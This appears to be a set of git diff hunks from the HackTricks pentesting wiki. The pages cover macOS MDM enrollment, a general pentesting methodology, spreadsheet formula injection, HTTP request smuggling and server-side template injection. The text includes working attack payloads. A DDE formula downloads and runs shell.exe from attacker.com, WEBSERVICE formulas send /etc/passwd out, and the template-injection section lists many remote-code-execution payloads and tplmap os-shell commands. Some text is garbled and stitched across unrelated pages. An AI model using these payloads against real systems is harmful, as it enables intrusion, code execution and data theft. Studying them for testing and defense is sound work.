Support HackTricks and get benefits!
@@ -305,3 +307,5 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,11 +16,12 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## MacOS MDM
-### Basics
+# MacOS MDM
-#### What is MDM (Mobile Device Management)?
+## Basics
+
+### What is MDM (Mobile Device Management)?
[Mobile Device Management](https://en.wikipedia.org/wiki/Mobile\_device\_management) (MDM) is a technology commonly used to **administer end-user computing devices** such as mobile phones, laptops, desktops and tablets. In the case of Apple platforms like iOS, macOS and tvOS, it refers to a specific set of features, APIs and techniques used by administrators to manage these devices. Management of devices via MDM requires a compatible commercial or open-source MDM server that implements support for the [MDM Protocol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf).
@@ -28,7 +29,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Requires an **MDM server** which implements support for the MDM protocol
* MDM server can **send MDM commands**, such as remote wipe or “install this config”
-#### Basics What is DEP (Device Enrolment Program)?
+### Basics What is DEP (Device Enrolment Program)?
The [Device Enrollment Program](https://www.apple.com/business/site/docs/DEP\_Guide.pdf) (DEP) is a service offered by Apple that **simplifies** Mobile Device Management (MDM) **enrollment** by offering **zero-touch configuration** of iOS, macOS, and tvOS devices. Unlike more traditional deployment methods, which require the end-user or administrator to take action to configure a device, or manually enroll with an MDM server, DEP aims to bootstrap this process, **allowing the user to unbox a new Apple device and have it configured for use in the organization almost immediately**.
@@ -42,21 +43,21 @@ Administrators can leverage DEP to automatically enroll devices in their organiz
Unfortunately, if an organization has not taken additional steps to **protect their MDM enrollment**, a simplified end-user enrollment process through DEP can also mean a simplified process for **attackers to enroll a device of their choosing in the organization’s MDM** server, assuming the "identity" of a corporate device.
{% endhint %}
-#### Basics What is SCEP (Simple Certificate Enrolment Protocol)?
+### Basics What is SCEP (Simple Certificate Enrolment Protocol)?
* A relatively old protocol, created before TLS and HTTPS were widespread.
* Gives clients a standardized way of sending a **Certificate Signing Request** (CSR) for the purpose of being granted a certificate. The client will ask the server to give him a signed certificate.
-#### What are Configuration Profiles (aka mobileconfigs)?
+### What are Configuration Profiles (aka mobileconfigs)?
* Apple’s official way of **setting/enforcing system configuration.**
* File format that can contain multiple payloads.
* Based on property lists (the XML kind).
* “can be signed and encrypted to validate their origin, ensure their integrity, and protect their contents.” Basics — Page 70, iOS Security Guide, January 2018.
-### Protocols
+## Protocols
-#### MDM
+### MDM
* Combination of APNs (**Apple server**s) + RESTful API (**MDM** **vendor** servers)
* **Communication** occurs between a **device** and a server associated with a **device** **management** **product**
@@ -64,7 +65,7 @@ Unfortunately, if an organization has not taken additional steps to **protect th
* All over **HTTPS**. MDM servers can be (and are usually) pinned.
* Apple grants the MDM vendor an **APNs certificate** for authentication
-#### DEP
+### DEP
* **3 APIs**: 1 for resellers, 1 for MDM vendors, 1 for device identity (undocumented):
* The so-called [DEP "cloud service" API](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf). This is used by MDM servers to associate DEP profiles with specific devices.
@@ -73,7 +74,7 @@ Unfortunately, if an organization has not taken additional steps to **protect th
* More modern and **JSON** based (vs. plist)
* Apple grants an **OAuth token** to the MDM vendor
-**DEP "cloud service" API**
+#### DEP "cloud service" API
* RESTful
* sync device records from Apple to the MDM server
@@ -83,7 +84,7 @@ Unfortunately, if an organization has not taken additional steps to **protect th
* Additional trusted certificates for server URL (optional pinning)
* Extra settings (e.g. which screens to skip in Setup Assistant)
-### Steps for enrolment and management
+## Steps for enrolment and management
1. Device record creation (Reseller, Apple): The record for the new device is created
2. Device record assignment (Customer): The device is assigned to a MDM server
@@ -97,7 +98,7 @@ Unfortunately, if an organization has not taken additional steps to **protect th
The file `/Library/Developer/CommandLineTools/SDKs/MacOSX10.15.sdk/System/Library/PrivateFrameworks/ConfigurationProfiles.framework/ConfigurationProfiles.tbd` exports functions that can be considered **high-level "steps"** of the enrolment process.
-#### Step 4: DEP check-in - Getting the Activation Record
+### Step 4: DEP check-in - Getting the Activation Record
This part of the process occurs when a **user boots a Mac for the first time** (or after a complete wipe)
@@ -133,7 +134,7 @@ The response is a JSON dictionary with some important data like:
* **url**: URL of the MDM vendor host for the activation profile
* **anchor-certs**: Array of DER certificates used as trusted anchors
-#### **Step 5: Profile Retrieval**
+### **Step 5: Profile Retrieval**
.png>)
@@ -146,9 +147,9 @@ The response is a JSON dictionary with some important data like:
* Signed using the **device identity certificate (from APNS)**
* **Certificate chain** includes expired **Apple iPhone Device CA**
- (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1).png>)
+ (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1).png>)
-#### Step 6: Profile Installation
+### Step 6: Profile Installation
* Once retrieved, **profile is stored on the system**
* This step begins automatically (if in **setup assistant**)
@@ -183,7 +184,7 @@ Typically, **activation profile** provided by an MDM vendor will **include the f
* Property: IdentityCertificateUUID
* Delivered via SCEP payload
-#### **Step 7: Listening for MDM commands**
+### **Step 7: Listening for MDM commands**
* After MDM check-in is complete, vendor can **issue push notifications using APNs**
* Upon receipt, handled by **`mdmclient`**
@@ -192,9 +193,9 @@ Typically, **activation profile** provided by an MDM vendor will **include the f
* **`ServerURLPinningCertificateUUIDs`** for pinning request
* **`IdentityCertificateUUID`** for TLS client certificate
-### Attacks
+## Attacks
-#### Enrolling Devices in Other Organisations
+### Enrolling Devices in Other Organisations
As previously commented, in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\
Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected:
@@ -203,11 +204,12 @@ Therefore, this could be a dangerous entrypoint for attackers if the enrolment p
[enrolling-devices-in-other-organisations.md](enrolling-devices-in-other-organisations.md)
{% endcontent-ref %}
-### **References**
+## **References**
* [https://www.youtube.com/watch?v=ku8jZe-MHUU](https://www.youtube.com/watch?v=ku8jZe-MHUU)
* [https://duo.com/labs/research/mdm-me-maybe](https://duo.com/labs/research/mdm-me-maybe)
+
Support HackTricks and get benefits!
@@ -223,3 +225,5 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -22,15 +16,22 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## Pentesting Methodology
+
+---
+description: >-
+ This is the main page. Here you can find the typical workflow for the
+ pentesting of a machine
+---
+
+# Pentesting Methodology
-### 0- Physical Attacks
+## 0- Physical Attacks
Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](physical-attacks/physical-attacks.md) and others about [**escaping from GUI applications**](physical-attacks/escaping-from-gui-applications/).
-### 1 - [Discovering hosts inside the network ](pentesting/pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/)
+## 1 - [Discovering hosts inside the network ](pentesting/pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/)
**Depending** if the **test** you are perform is an **internal or external test** you may be interested on finding **hosts inside the company network** (internal test) or **finding assets of the company on the internet** (external test).
@@ -38,20 +39,20 @@ Do you have **physical access** to the machine that you want to attack? You shou
Note that if you are performing an external test, once you manage to obtain access to the internal network of the company you should re-start this guide.
{% endhint %}
-### **2-** [**Having Fun with the network**](pentesting/pentesting-network/) **(Internal)**
+## **2-** [**Having Fun with the network**](pentesting/pentesting-network/) **(Internal)**
**This section only applies if you are performing an internal test.**\
Before attacking a host maybe you prefer to **steal some credentials** **from the network** or **sniff** some **data** to learn **passively/actively(MitM)** what can you find inside the network. You can read [**Pentesting Network**](pentesting/pentesting-network/#sniffing).
-### 3- [Port Scan - Service discovery](pentesting/pentesting-network/#scanning-hosts)
+## 3- [Port Scan - Service discovery](pentesting/pentesting-network/#scanning-hosts)
The first thing to do when **looking for vulnerabilities in a host** is to know which **services are running** in which ports. Let's see the[ **basic tools to scan ports of hosts**](pentesting/pentesting-network/#scanning-hosts).
-### **4-** [Searching service version exploits](search-exploits.md)
+## **4-** [Searching service version exploits](search-exploits.md)
Once you know which services are running, and maybe their version, you have to **search for known vulnerabilities**. Maybe you get lucky and there is a exploit to give you a shell...
-### **5-** Pentesting Services
+## **5-** Pentesting Services
If there isn't any fancy exploit for any running service, you should look for **common misconfigurations in each service running.**
@@ -62,25 +63,25 @@ Also, a small guide on how to[ **find known vulnerabilities in software**](searc
**If your service is not inside the index, search in Google** for other tutorials and **let me know if you want me to add it.** If you **can't find anything** in Google, perform your **own blind pentesting**, you could start by **connecting to the service, fuzzing it and reading the responses** (if any).
-#### 5.1 Automatic Tools
+### 5.1 Automatic Tools
There are also several tools that can perform **automatic vulnerabilities assessments**. **I would recommend you to try** [**Legion**](https://github.com/carlospolop/legion)**, which is the tool that I have created and it's based on the notes about pentesting services that you can find in this book.**
-#### **5.2 Brute-Forcing services**
+### **5.2 Brute-Forcing services**
In some scenarios a **Brute-Force** could be useful to **compromise** a **service**. [**Find here a CheatSheet of different services brute forcing**](brute-force.md)**.**
-### 6- [Phishing](phishing-methodology/)
+## 6- [Phishing](phishing-methodology/)
If at this point you haven't found any interesting vulnerability you **may need to try some phishing** in order to get inside the network. You can read my phishing methodology [here](phishing-methodology/):
-### **7-** [**Getting Shell**](shells/shells/)
+## **7-** [**Getting Shell**](shells/shells/)
Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](shells/shells/).
Specially in Windows you could need some help to **avoid antiviruses**: \[Check this page]\(windows/av-bypass.md)**.**
-### 8- Inside
+## 8- Inside
If you have troubles with the shell, you can find here a small **compilation of the most useful commands** for pentesters:
@@ -88,13 +89,13 @@ If you have troubles with the shell, you can find here a small **compilation of
* [**Windows (CMD)**](windows/basic-cmd-for-pentesters.md)
* [**Winodows (PS)**](windows/basic-powershell-for-pentesters/)
-### **9 -** [**Exfiltration**](exfiltration.md)
+## **9 -** [**Exfiltration**](exfiltration.md)
You will probably need to **extract some data from the victim** or even **introduce something** (like privilege escalation scripts). **Here you have a** [**post about common tools that you can use with these purposes**](exfiltration.md)**.**
-### **10- Privilege Escalation**
+## **10- Privilege Escalation**
-#### **10.1- Local Privesc**
+### **10.1- Local Privesc**
If you are **not root/Administrator** inside the box, you should find a way to **escalate privileges.**\
Here you can find a **guide to escalate privileges locally in** [**Linux**](linux-unix/privilege-escalation/) **and in** [**Windows**](windows/windows-local-privilege-escalation/)**.**\
@@ -107,49 +108,50 @@ You should also check this pages about how does **Windows work**:
**Don't forget to checkout the best tools to enumerate Windows and Linux local Privilege Escalation paths:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
-#### **10.2- Domain Privesc**
+### **10.2- Domain Privesc**
Here you can find a [**methodology explaining the most common actions to enumerate, escalate privileges and persist on an Active Directory**](windows/active-directory-methodology/). Even if this is just a subsection of a section, this process could be **extremely delicate** on a Pentesting/Red Team assignment.
-### 11 - POST
+## 11 - POST
-#### **11**.1 - Looting
+### **11**.1 - Looting
Check if you can find more **passwords** inside the host or if you have **access to other machines** with the **privileges** of your **user**.\
Find here different ways to [**dump passwords in Windows**](windows/stealing-credentials/).
-#### 11.2 - Persistence
+### 11.2 - Persistence
**Use 2 o 3 different types of persistence mechanism so you won't need to exploit the system again.**\
**Here you can find some** [**persistence tricks on active directory**](windows/active-directory-methodology/#persistence)**.**
TODO: Complete persistence Post in Windows & Linux
-### 12 - Pivoting
+## 12 - Pivoting
With the **gathered credentials** you could have access to other machines, or maybe you need to **discover and scan new hosts** (start the Pentesting Methodology again) inside new networks where your victim is connected.\
In this case tunnelling could be necessary. Here you can find [**a post talking about tunnelling**](tunneling-and-port-forwarding.md).\
You definitely should also check the post about [Active Directory pentesting Methodology](windows/active-directory-methodology/). There you will find cool tricks to move laterally, escalate privileges and dump credentials.\
Check also the page about [**NTLM**](windows/ntlm/), it could be very useful to pivot on Windows environments..
-### MORE
+## MORE
-#### [Android Applications](mobile-apps-pentesting/android-app-pentesting/)
+### [Android Applications](mobile-apps-pentesting/android-app-pentesting/)
-#### **Exploiting**
+### **Exploiting**
* [**Basic Linux Exploiting**](exploiting/linux-exploiting-basic-esp/)
* [**Basic Windows Exploiting**](exploiting/windows-exploiting-basic-guide-oscp-lvl.md)
* [**Basic exploiting tools**](exploiting/tools/)
-#### [**Basic Python**](misc/basic-python/)
+### [**Basic Python**](misc/basic-python/)
-#### **Crypto tricks**
+### **Crypto tricks**
* [**ECB**](cryptography/electronic-code-book-ecb.md)
* [**CBC-MAC**](cryptography/cipher-block-chaining-cbc-mac-priv.md)
* [**Padding Oracle**](cryptography/padding-oracle-priv.md)
+
Support HackTricks and get benefits!
@@ -165,3 +167,5 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,9 +16,10 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## Formula Injection
-### Info
+# Formula Injection
+
+## Info
If your **input** is being **reflected** inside **CSV file**s (or any other file that is probably going to be opened by **Excel**), you maybe able to put Excel **formulas** that will be **executed** when the user **opens the file** or when the user **clicks on some link** inside the excel sheet.
@@ -26,7 +27,7 @@ If your **input** is being **reflected** inside **CSV file**s (or any other file
Nowadays **Excel will alert** (several times) the **user when something is loaded from outside the Excel** in order to prevent him to from malicious action. Therefore, special effort on Social Engineering must be applied to he final payload.
{% endhint %}
-### Hyperlink
+## Hyperlink
**The following example is very useful to exfiltrate content from the final excel sheet and to perform requests to arbitrary locations. But it requires the use to click on the link (and accept the warning prompts).**
@@ -49,7 +50,7 @@ The details of student in logged in the attackers web server.
-### RCE
+## RCE
For this example to work it's **needed to have enable the following configuration**:\
File → Options → Trust Center → Trust Center Settings → External Content → Enable Dynamic Data Exchange Server Launch\
@@ -59,17 +60,17 @@ The good news is that **this payload is executed automatically when the file is
It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
- (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1).png>)
+ (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1).png>)
-#### More
+### More
```bash
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
```
-### LFI
+## LFI
-**LibreOffice Calc**
+#### LibreOffice Calc
* This will read the 1st line from the local /etc/passwd file: `='file:///etc/passwd'#$passwd.A1`
* Ex-filtrate it: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)))`
@@ -85,7 +86,7 @@ It's possible to execute a calculator with the following payload **`=cmd|' /C ca
* CONCATENATE((SUBSTITUTE(MID((ENCODEURL(‘file:///etc/passwd’#$passwd.A19)),1,41),”%”,”-“)),”.\Support HackTricks and get benefits!
@@ -144,3 +146,5 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,42 +16,43 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## HTTP Request Smuggling / HTTP Desync Attack
-### What is
+# HTTP Request Smuggling / HTTP Desync Attack
+
+## What is
This vulnerability occurs when a **desyncronization** between **front-end proxies** and the **back-end** server allows an **attacker** to **send** an HTTP **request** that will be **interpreted** as a **single request** by the **front-end** proxies (load balance/reverse-proxy) and **as 2 request** by the **back-end** server.\
This allows a user to **modify the next request that arrives to the back-end server after his**.
-#### Theory
+### Theory
-[**RFC Specification (2161)**](https://tools.ietf.org/html/rfc2616)
+#### [RFC Specification (2161)](https://tools.ietf.org/html/rfc2616)
> If a message is received with both a Transfer-Encoding header field and a Content-Length header field, the latter MUST be ignored.
-**Content-Length**
+#### Content-Length
> The Content-Length entity header indicates the size of the entity-body, in bytes, sent to the recipient.
-**Transfer-Encoding: chunked**
+#### Transfer-Encoding: chunked
> The Transfer-Encoding header specifies the form of encoding used to safely transfer the payload body to the user.\
> Chunked means that large data is sent in a series of chunks
-#### Reality
+### Reality
The **Front-End** (a load-balance / Reverse Proxy) **process** the _**content-length**_ or the _**transfer-encoding**_ header and the **Back-end** server **process the other** one provoking a **desyncronization** between the 2 systems.\
This could be very critical as **an attacker will be able to send one request** to the reverse proxy that will be **interpreted** by the **back-end** server **as 2 different requests**. The **danger** of this technique resides in the fact the **back-end** server **will interpret** the **2nd request injected** as if it **came from the next client** and the **real request** of that client will be **part** of the **injected request**.
-#### Particularities
+### Particularities
-Remember that in HTTP **a new line character is composed by 2 bytes:**
+Remember that in HTTP **a new line character is composed by 2 bytes: `\r`**
* **Content-Length**: This header uses a **decimal number** to indicate the **number** of **bytes** of the **body** of the request. The body is expected to end in the last character, **a new line is not needed in the end of the request**.
-* **Transfer-Encoding:** This header uses in the **body** an **hexadecimal number** to indicate the **number** of **bytes** of the **next chunk**. The **chunk** must **end** with a **new line** but this new line **isn't counted** by the length indicator. This transfer method must end with a **chunk of size 0 followed by 2 new lines**: `0\r\n`
+* **Transfer-Encoding:** This header uses in the **body** an **hexadecimal number** to indicate the **number** of **bytes** of the **next chunk**. The **chunk** must **end** with a **new line** but this new line **isn't counted** by the length indicator. This transfer method must end with a **chunk of size 0 followed by 2 new lines**: `0\r\n\r`
* **Connection**: Based on my experience it's recommended to use **`Connection: keep-alive`** on the first request of the request Smuggling.
-### Basic Examples
+## Basic Examples
So, request smuggling attacks involve placing both the `Content-Length` header and the `Transfer-Encoding` header into a single HTTP request and manipulating these so that the front-end and back-end servers process the request differently. The exact way in which this is done depends on the behaviour of the two servers:
@@ -59,7 +60,7 @@ So, request smuggling attacks involve placing both the `Content-Length` header a
* **TE.CL**: the front-end server uses the `Transfer-Encoding` header and the back-end server uses the `Content-Length` header.
* **TE.TE**: the front-end and back-end servers both support the `Transfer-Encoding` header, but one of the servers can be induced not to process it by obfuscating the header in some way.
-#### CL.TE vulnerabilities
+### CL.TE vulnerabilities
Here, the **front-end** server uses the **`Content-Length`** header and the **back-end** server uses the **`Transfer-Encoding`** header. We can perform a simple HTTP request smuggling attack as follows:
@@ -72,9 +73,9 @@ Here, the **front-end** server uses the **`Content-Length`** header and the **ba
`GET /404 HTTP/1.1`\
`Foo: x`
-Note how `Content-Length` indicate the **bodies request length is 30 bytes long** (_remember that HTTP uses as new line, so 2bytes each new line_), so the reverse proxy **will send the complete request** to the back-end, and the back-end will process the `Transfer-Encoding` header leaving the `GET /404 HTTP/1.1` as the **begging of the next request** (BTW, the next request will be appended to `Foo:xSupport HackTricks and get benefits!
@@ -519,3 +521,5 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,9 +16,10 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## SSTI (Server Side Template Injection)
-### What is server-side template injection?
+# SSTI (Server Side Template Injection)
+
+## What is server-side template injection?
A server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.
@@ -36,17 +37,17 @@ In the previous example **part of the template** itself is being **dynamically g
http://vulnerable-website.com/?name={{bad-stuff-here}}
```
-### Constructing a server-side template injection attack
+## Constructing a server-side template injection attack
-#### Detect
+### Detect
As with any vulnerability, the first step towards exploitation is being able to find it. Perhaps the simplest initial approach is to try **fuzzing the template** by injecting a sequence of special characters commonly used in template expressions, such as the polyglot **`${{<%[%'"}}%\`.**\
In order to check if the server is vulnerable you should **spot the differences** between the response with **regular data** on the parameter and the **given payload**.\
If an **error is thrown** it will be quiet easy to figure out that **the server is vulnerable** and even which **engine is running**. But you could also find a vulnerable server if you were **expecting** it to **reflect** the given payload and it is **not being reflected** or if there are some **missing chars** in the response.
-**Detect - Plaintext context**
+#### Detect - Plaintext context
The given input is being **rendered and reflected** into the response. This is easily **mistaken for a simple** [**XSS**](../xss-cross-site-scripting/) vulnerability, but it's easy to differentiate if you try to set **mathematical operations** within a template expression:
@@ -58,7 +59,7 @@ ${{7*7}}
#{7*7}
```
-**Detect - Code context**
+#### Detect - Code context
In these cases the **user input** is being placed **within** a **template expression**:
@@ -71,7 +72,7 @@ The URL access that page could be similar to: `http://vulnerable-website.com/?gr
If you **change** the **`greeting`** parameter for a **different value** the **response won't contain the username**, but if you access something like: `http://vulnerable-website.com/?greeting=data.username}}hello` then, **the response will contain the username** (if the closing template expression chars were **`}}`**).\
If an **error** is thrown during these test, it will be easier to find that the server is vulnerable.
-#### Identify
+### Identify
Once you have detected the template injection potential, the next step is to identify the template engine.\
Although there are a huge number of templating languages, many of them use very similar syntax that is specifically chosen not to clash with HTML characters.
@@ -88,9 +89,9 @@ Otherwise, you'll need to manually **test different language-specific payloads**
.png>)
-#### Exploit
+### Exploit
-**Read**
+#### Read
The first step after finding template injection and identifying the template engine is to read the documentation. Key areas of interest are:
@@ -99,7 +100,7 @@ The first step after finding template injection and identifying the template eng
* Lists of builtin methods, functions, filters, and variables.
* Lists of extensions/plugins - some may be enabled by default.
-**Explore**
+#### Explore
Assuming no exploits have presented themselves, the next step is to **explore the environment** to find out exactly what **you have access to**. You can expect to find both **default objects** provided by the template engine, and **application-specific objects** passed in to the template by the developer. Many template systems expose a 'self' or namespace object containing everything in scope, and an idiomatic way to list an object's attributes and methods.
@@ -107,13 +108,13 @@ If there's no builtin self object you're going to have to bruteforce variable na
Developer-supplied objects are particularly likely to contain sensitive information, and may vary between different templates within an application, so this process should ideally be applied to every distinct template individually.
-**Attack**
+#### **Attack**
At this point you should have a **firm idea of the attack surface available** to you and be able to proceed with traditional security audit techniques, reviewing each function for exploitable vulnerabilities. It's important to approach this in the context of the wider application - some functions can be used to exploit application-specific features. The examples to follow will use template injection to trigger arbitrary object creation, arbitrary file read/write, remote file include, information disclosure and privilege escalation vulnerabilities.
-### Tools
+## Tools
-#### [Tplmap](https://github.com/epinna/tplmap)
+### [Tplmap](https://github.com/epinna/tplmap)
```python
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
@@ -121,17 +122,17 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomm
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
```
-### Exploits
+## Exploits
-#### Generic
+### Generic
In this **wordlist** you can find **variables defined** in the environments of some of the engines mentioned below:
* [https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt)
-#### Java
+### Java
-**Java - Basic injection**
+#### Java - Basic injection
```java
${7*7}
@@ -141,13 +142,13 @@ ${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
```
-**Java - Retrieve the system’s environment variables**
+#### Java - Retrieve the system’s environment variables
```java
${T(java.lang.System).getenv()}
```
-**Java - Retrieve /etc/passwd**
+#### Java - Retrieve /etc/passwd
```java
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
@@ -155,7 +156,7 @@ ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
```
-#### FreeMarker (Java)
+### FreeMarker (Java)
You can try your payloads at [https://try.freemarker.apache.org](https://try.freemarker.apache.org)
@@ -173,7 +174,7 @@ ${"freemarker.template.utility.Execute"?new()("id")}
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(" ")}
```
-**Freemarker - Sandbox bypass**
+#### Freemarker - Sandbox bypass
⚠️ only works on Freemarker versions below 2.3.30
@@ -185,12 +186,12 @@ ${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI()
${dwf.newInstance(ec,null)("id")}
```
-**More information**
+#### More information
* In FreeMarker section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker)
-#### Velocity (Java)
+### Velocity (Java)
```java
#set($str=$class.inspect("java.lang.String").type)
@@ -203,12 +204,12 @@ $str.valueOf($chr.toChars($out.read()))
#end
```
-**More information**
+#### More information
* In Velocity section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity)
-#### Thymeleaf (Java)
+### Thymeleaf (Java)
The typical test expression for SSTI is `${7*7}`. This expression works in Thymeleaf, too. If you want to achieve remote code execution, you can use one of the following test expressions:
@@ -225,7 +226,7 @@ If we take a deeper look into the documentation of the Thymeleaf template engine
#{selection.__${sel.code}__}
```
-**Vulnerable example**
+#### Vulnerable example
```markup
@@ -234,11 +235,11 @@ http://localhost:8082/(7*7)
http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
```
-**More information**
+#### More information
* [https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/)
-#### Spring View Manipulation (Java)
+### Spring View Manipulation (Java)
```java
__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x
@@ -247,7 +248,7 @@ __${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x
[https://github.com/veracode-research/spring-view-manipulation](https://github.com/veracode-research/spring-view-manipulation)
-#### Pebble (Java)
+### Pebble (Java)
* `{{ someString.toUPPERCASE() }}`
@@ -266,7 +267,6 @@ New version of Pebble :
-
{% set bytes = (1).TYPE
.forName('java.lang.Runtime')
.methods[6]
@@ -280,7 +280,7 @@ New version of Pebble :
.newInstance(([bytes]).toArray()) }}
```
-#### Jinjava (Java)
+### Jinjava (Java)
```java
{{'a'.toUpperCase()}} would result in 'A'
@@ -289,7 +289,7 @@ New version of Pebble :
Jinjava is an open source project developed by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)
-**Jinjava - Command execution**
+#### Jinjava - Command execution
Fixed by [https://github.com/HubSpot/jinjava/pull/230](https://github.com/HubSpot/jinjava/pull/230)
@@ -303,11 +303,11 @@ Fixed by [https://github.com/HubSpot/jinjava/pull/230](https://github.com/HubSpo
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
```
-**More information**
+#### More information
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava)
-#### Hubspot - HuBL (Java)
+### Hubspot - HuBL (Java)
* `{% %}` statement delimiters
* `{{ }}` expression delimiters
@@ -336,7 +336,6 @@ Search for "com.hubspot.content.hubl.context.TemplateContextRequest" and discove
//It was also possible to call methods on the created object by combining the
-
{% raw %}
{% %} and {{ }} blocks
{% set ji='a'.getClass().forName('com.hubspot.jinjava.Jinjava').newInstance().newInterpreter() %}
@@ -362,11 +361,11 @@ Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstanc
//Output: Linux bumpy-puma 4.9.62-hs4.el6.x86_64 #1 SMP Fri Jun 1 03:00:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
```
-**More information**
+#### More information
* [https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html)
-#### Expression Language - EL (Java)
+### Expression Language - EL (Java)
* `${"aaaa"}` - "aaaa"
* `${99999+1}` - 100000.
@@ -381,7 +380,7 @@ Check the following page to learn more about the **exploitation of EL interprete
[el-expression-language.md](el-expression-language.md)
{% endcontent-ref %}
-#### Smarty (PHP)
+### Smarty (PHP)
```php
{$smarty.version}
@@ -391,12 +390,12 @@ Check the following page to learn more about the **exploitation of EL interprete
{system('cat index.php')} // compatible v3
```
-**More information**
+#### More information
* In Smarty section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
